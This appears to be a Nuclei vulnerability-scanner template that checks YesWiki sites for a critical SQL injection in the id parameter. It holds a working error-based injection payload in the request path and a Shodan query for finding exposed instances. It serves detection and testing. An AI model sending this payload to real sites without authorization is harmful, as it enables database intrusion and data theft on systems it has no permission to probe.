id: yeswiki-sql

info:
  name: YesWiki <2022-07-07 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    YesWiki before 2022-07-07 contains a SQL injection vulnerability via the id parameter in the AccueiL URL. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  metadata:
    verified: true
    shodan-query: http.html:"yeswiki"
  tags: yeswiki,sqli,huntr

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3f'

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/28
